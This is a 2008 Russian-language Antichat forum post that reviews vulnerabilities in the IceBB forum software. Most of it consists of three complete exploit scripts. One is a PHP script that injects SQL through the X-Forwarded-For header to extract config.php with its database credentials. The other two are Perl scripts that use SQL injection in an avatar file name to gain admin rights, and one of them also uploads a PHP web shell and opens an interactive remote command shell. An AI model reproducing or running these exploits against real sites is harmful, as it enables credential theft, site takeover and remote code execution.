Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
[Обзор уязвимостей IceBB] |
14.01.2008, 13:27
|
|
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499
Репутация:
3702
|
|
[Обзор уязвимостей IceBB]
Обзор уязвимостей IceBB
URL: http://www.icebb.net/
Actual version: 1.0-rc8
Source: Download
IceBB 1.0-rc6 Remote Database Authentication Details Exploit
Воздействие: Обход аутентификации
PHP код:
<?php
/*---------------------------------------------------------*\
IceBB 1.0-rc6 - Database Authentication Details Exploit
[|Description:|]
A security breach has been discoverd in IceBB 1.0-rc6.
This breach is caused by a bad filtering of the X-Forwarded-For variable:
> ./includes/functions.php, line 73
$ip = empty($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['REMOTE_ADDR'] : $_SERVER['HTTP_X_FORWARDED_FOR'];
$ip = $this->clean_key($ip);
$input['ICEBB_USER_IP'] = $ip;
> ./icebb.php, line 169
$icebb->client_ip = $input['ICEBB_USER_IP'];
> ./admin/index.php, line 112
$icebb->adsess = $db->fetch_result("SELECT adsess.*,u.id as userid,u.username,u.temp_ban,g.g_view_board FROM icebb_adsess AS adsess LEFT JOIN icebb_users AS u ON u.username=adsess.user LEFT JOIN icebb_groups AS g ON u.user_group=g.gid WHERE adsess.asid='{$icebb->input['s']}' AND adsess.ip='{$icebb->client_ip}' LIMIT 1");
A hacker could exploit this security breach in order to alter a SQL request.
[|Advisory:|]
http://www.aeroxteam.fr/advisory-IceBB-1.0rc6.txt
[|Solution:|]
No one. Think about update your forum core when a patch will be available on the official website.
Discovered by Gu1ll4um3r0m41n (aeroxteam --[at]-- gmail --[dot]-- com)
for AeroX (AeroXteam.fr)
(C)opyleft 2007
Greetz: Math², KERNEL_ERROR, NeoMorphS, Snake91, Goundy, Alkino (...) And everybody from #aerox
\*---------------------------------------------------------*/
if(count($argv) == 4) {
head();
if($argv[3] != 1 && $argv[3] != 2) {
die("\r\nIncorrect version !");
} else {
$version = $argv[3];
}
############## PART 1 ##############
echo "[+] Connecting... ";
$sock = fsockopen($argv[1], 80, $eno, $estr, 30);
if (!$sock) {
die("Failed\r\n\r\nCould not connect to ".$argv[1]." on the port 80 !");
}
echo "OK\r\n";
echo "[+] Getting tables prefix... ";
$query1 = "GET ".$argv[2]."index.php?s=fake_sid&act=sql HTTP/1.1\r\n";
$query1 .= "Host: ".$argv[1]."\r\n";
$query1 .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9\r\n";
$query1 .= "X-Forwarded-For: ".getInj()."\r\n";
$query1 .= "Accept: */*\r\n";
$query1 .= "Connection: Close\r\n\r\n";
fwrite($sock, $query1);
$result1 = '';
while(!feof($sock)) {
$result1 .= fgets($sock);
}
fclose($sock);
if(preg_match("`<tr><td class='row2'><a href='index\.php\?s=my_sessid&act=sql&table=(.*?)adsess'>`", $result1, $expreg)) {
if($expreg[1] == '') {
echo "Failed\r\n\r\nExploit Failed :(";
die();
}
$prefix = $expreg[1];
echo "OK (".$expreg[1].")\r\n";
} else {
echo "Failed\r\n\r\nExploit Failed :(";
die();
}
############## PART 2 ##############
echo "[+] Creating fake skin... ";
$sock = fsockopen($argv[1], 80, $eno, $estr, 30);
if (!$sock) {
die("Failed\r\n\r\nCould not connect to ".$argv[1]." on the port 80 !");
}
$postdata2 = "act=sql&func=runquery&query=INSERT+INTO+%60".$prefix."skins%60+%28%60skin_id%60%2C+%60skin_name%60%2C+%60skin_author%60%2C+%60skin_site%60%2C+%60skin_folder%60%2C+%60skin_preview%60%2C+%60skin_is_default%60%2C+%60skin_is_hidden%60%2C+%60skin_wrapper%60%2C+%60skin_macro_cache%60%2C+%60smiley_set%60%29+VALUES+%28666%2C+0x6F776E4564%2C+0x6834783072%2C+0x687474703A2F2F7777772E676F6F676C652E6672%2C+0x2E2E%2C+0x00%2C+0%2C+1%2C+0x00%2C+0x00%2C+0x00%29%3B";
$query2 = "POST ".$argv[2]."index.php?s=fake_sid HTTP/1.1\r\n";
$query2 .= "Host: ".$argv[1]."\r\n";
$query2 .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9\r\n";
$query2 .= "X-Forwarded-For: ".getInj()."\r\n";
$query2 .= "Accept: */*\r\n";
$query2 .= "Connection: Close\r\n";
$query2 .= "Content-Type: application/x-www-form-urlencoded\r\n";
$query2 .= "Content-Length: ".strlen($postdata2)."\r\n\r\n";
$query2 .= $postdata2;
fwrite($sock, $query2);
$result2 = '';
while(!feof($sock)) {
$result2 .= fgets($sock);
}
fclose($sock);
if(strpos($result2, "<textarea name='query' rows='5' cols='50'>INSERT INTO `icebb_skins` (`skin_id`, `skin_name`, `skin_author`, `skin_site`, `skin_folder`, `skin_preview`, `skin_is_default`, `skin_is_hidden`, `skin_wrapper`, `skin_macro_cache`, `smiley_set`) VALUES (666, 0x6F776E4564, 0x6834783072, 0x687474703A2F2F7777772E676F6F676C652E6672, 0x2E2E, 0x00, 0, 1, 0x00, 0x00, 0x00);</textarea>") === FALSE) {
echo "Failed. Maybe Skin already exists ?\r\n";
} else {
echo "OK\r\n";
}
############## PART 3 ##############
echo "[+] Getting config.php... ";
$sock = fsockopen($argv[1], 80, $eno, $estr, 30);
if (!$sock) {
die("Failed\r\n\r\nCould not connect to ".$argv[1]." on the port 80 !");
}
$query3 = "GET ".$argv[2]."index.php?s=fake_sid&act=skins&func=templates&skinid=666&code=edit&template=config HTTP/1.1\r\n";
$query3 .= "Host: ".$argv[1]."\r\n";
$query3 .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9\r\n";
$query3 .= "X-Forwarded-For: ".getInj()."\r\n";
$query3 .= "Accept: */*\r\n";
$query3 .= "Connection: Close\r\n\r\n";
fwrite($sock, $query3);
$result3 = '';
while(!feof($sock)) {
$result3 .= fgets($sock);
}
fclose($sock);
if(preg_match("`(<\?php.*\?>)`s", $result3, $expreg2)) {
echo "OK\r\n\r\n";
echo $expreg2[1];
} else {
echo "Failed\r\n\r\nExploit Failed :(";
}
############## PART 4 ##############
echo "\r\n\r\n[+] Removing fake skin... ";
$sock = fsockopen($argv[1], 80, $eno, $estr, 30);
if (!$sock) {
die("Failed\r\n\r\nCould not connect to ".$argv[1]." on the port 80 !");
}
$query4 = "GET ".$argv[2]."index.php?s=fake_sid&act=skins&func=disable&skinid=666 HTTP/1.1\r\n";
$query4 .= "Host: ".$argv[1]."\r\n";
$query4 .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9\r\n";
$query4 .= "X-Forwarded-For: ".getInj()."\r\n";
$query4 .= "Accept: */*\r\n";
$query4 .= "Connection: Close\r\n\r\n";
fwrite($sock, $query4);
fclose($sock);
echo "OK\r\n\r\n";
echo "Do you want to create a local config.php file ? (Y/N) ";
$a = strtoupper(trim(fgets(STDIN)));
if($a == 'Y') {
$handle = fopen('config_'.$argv[1].'_'.time().'.php', 'w');
fwrite($handle, $expreg2[1]);
fclose($handle);
}
} else {
usage();
}
function getInj() {
global $version;
if($version == 1) {
return "' AND 1=2 UNION SELECT 'my_sessid' as asid, 'lol' as user, '127.0.0.1' as ip, ".(time() - 60)." as logintime, 'home' as location, ".(time() - 55)." as last_action, 1 as userid, 'lol' as username /*";
} elseif($version == 2) {
return "' AND 1=2 UNION SELECT 'my_sessid' as asid, 'lol' as user, '127.0.0.1' as ip, ".(time() - 60)." as logintime, 'home' as location, ".(time() - 55)." as last_action, 1 as userid, 'lol' as username, 0 as temp_ban, 1 as g_view_board /*";
}
}
function usage() {
echo "+-------------------------------------------------------+\r\n";
echo "| IceBB <= 1.0-rc6 Database Authentication Details |\r\n";
echo "| By Gu1ll4um3r0m41n for AeroX |\r\n";
echo "| Usage: php exploit.php site.com /pathtoadmin/ version |\r\n";
echo "| Version: 1 = rc5 |\r\n";
echo "| 2 = rc6 |\r\n";
echo "+-------------------------------------------------------+\r\n";
}
function head() {
echo "+--------------------------------------------------+\r\n";
echo "| IceBB <= 1.0-rc6 Database Authentication Details |\r\n";
echo "| By Gu1ll4um3r0m41n for AeroX |\r\n";
echo "+--------------------------------------------------+\r\n\r\n";
}
?>
IceBB 1.0-rc5 Remote Code Execution Exploit
Воздействие: Выполнение произвольных команд
PHP код:
#!/usr/bin/perl
# IceBB 1.0-rc5 Remote Code Execution Exploit
# 1. register a user
# 2. run this exploit with this usage : $perl xpl.pl [host&path] [uname] [pass]
# 3. login with admin access :)
#
#
#### Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net
use LWP::UserAgent;
use HTTP::Cookies;
$port = "80";
$host = $ARGV[0];
$uname = $ARGV[1];
$passwd = $ARGV[2];
$url = "http://".$host;
print q(
###########################################################
# IceBB 1.0-rc5 Remote Code Exec Exploit #
# www.Hessamx.Net #
################# (C)oded By Hessam-x #####################
);
if (@ARGV < 3) {
print " # usage : xpl.pl [host&path] [uname] [pass]\n";
print " # e.g : xpl.pl www.milw0rm.com/icebb/ str0ke 123456\n";
exit();
}
print " [~] User/Password : $uname/$passwd \n";
print " [~] Host : $host \n";
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->cookie_jar( $cookie_jar );
$login = $xpl->post($url.'index.php',
Content => [
'act' => 'login',
'from' => 'index.php',
'user' => $uname,
'pass' => $passwd,
'func' => 'Login',
],);
if($cookie_jar->as_string =~ /icebb_sessid=(.*?);/) {
$cookie = $1;
print " [~] Logined ...\n";
} else {
print " [-] Can not Login In $host !\n";
exit();
}
$badcode = "', user_group='1";
$avata = $xpl->post($url.'index.php',Content_Type => 'form-data',
Content => [
'avtype' => 'upload',
'act' => 'ucp',
'func' => 'avatar',
'file' => [
undef,
'avatar.jpg'.$badcode,
Content_type => 'text/plain',
Content => 'MYAVATAR',
],
'submit' => 'Save',
],
);
$avat = $xpl->post($url.'index.php',Content_Type => 'form-data',
Content => [
'avtype' => 'upload',
'act' => 'ucp',
'func' => 'avatar',
'file' => [
undef,
'shell.php'.$badcode,
Content_type => 'text/plain',
Content => '<? echo 1 ; echo _START_ ; system(\$_GET[\'cmd\']); echo _END_ ; ?>',
],
'submit' => 'Save',
],
);
$test = $xpl->get($url.'index.php');
if($test->as_string =~ /Admin Control Center/) {
print " [+] You Are admin Now ! \n";
} else {
print " [-] Exploit Failed ! \n";
exit();
}
if($test->as_string =~ /profile=(.*?)'>/) {
$uid = $1;
print " [~] User id : $1 \n";
} else {
print " [?] please enter user id : ";
chomp($uid=<STDIN>);
}
while ()
{
print "\n[Shell - type 'exit' for exit]\$ ";
chomp($exc=<STDIN>);
&sys($exc);
}
sub sys($exc) {
if ($exc eq 'exit') { exit() ; }
$res = $xpl->get($url.'uploads/av-'.$uid.'.php?cmd='.$exc);
@result = split(/\n/,$res->content);
$runned = 0;
$on = 0;
for $res(@result) {
if ($res =~ /^_END_/) { print "\n"; return 0; }
if ($on == 0) { print " $res\n"; }
if ($res =~ /^_START_/) { $on = 1; $runned = 1; }
}
if (!$runned) { print "\n Can not execute command . EXPLOIT FAILED !\n" ; exit(); };
}
print "\n #################################################### \n";
IceBB 1.0-rc5 Remote Create Admin Exploit
Воздействие: SQL-инъекция
PHP код:
#!/usr/bin/perl
# IceBB 1.0-rc5 Remote Create Admin Exploit
# 1. register a user
# 2. run this exploit with this usage : $perl xpl.pl [host&path] [uname] [pass]
# 3. login with admin access :)
# - magic_quotes_gpc = Off
#
#### Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net
use LWP::UserAgent;
use HTTP::Cookies;
$port = "80";
$host = $ARGV[0];
$uname = $ARGV[1];
$passwd = $ARGV[2];
$url = "http://".$host;
print q(
###########################################################
# IceBB 1.0-rc5 Remote Create Admin Exploit #
# www.Hessamx.Net #
################# (C)oded By Hessam-x #####################
);
if (@ARGV < 3) {
print " # usage : xpl.pl [host&path] [uname] [pass]\n";
print " # e.g : xpl.pl www.milw0rm.com/icebb/ str0ke 123456\n";
exit();
}
print " [~] User/Password : $uname/$passwd \n";
print " [~] Host : $host \n";
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->cookie_jar( $cookie_jar );
$login = $xpl->post($url.'index.php',
Content => [
'act' => 'login',
'from' => 'index.php',
'user' => $uname,
'pass' => $passwd,
'func' => 'Login',
],);
if($cookie_jar->as_string =~ /icebb_sessid=(.*?);/) {
$cookie = $1;
print " [~] Logined ...\n";
} else {
print " [-] Can not Login In $host !\n";
exit();
}
$badcode = "', user_group='1";
$avat = $xpl->post($url.'index.php',Content_Type => 'form-data',
Content => [
'avtype' => 'upload',
'act' => 'ucp',
'func' => 'avatar',
'file' => [
undef,
'avatar.jpg'.$badcode,
Content_type => 'text/plain',
Content => 'MYAVATAR',
],
'submit' => 'Save',
],
);
$test = $xpl->get($url.'index.php');
if($test->as_string =~ /Admin Control Center/) {
print " [+] You Are admin Now ! \n";
} else {
print " [-] Exploit Failed ! \n";
}
print "\n #################################################### \n";
Для поиска форумов в поиске пишем:
Последний раз редактировалось Solide Snake; 14.01.2008 в 13:38..
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид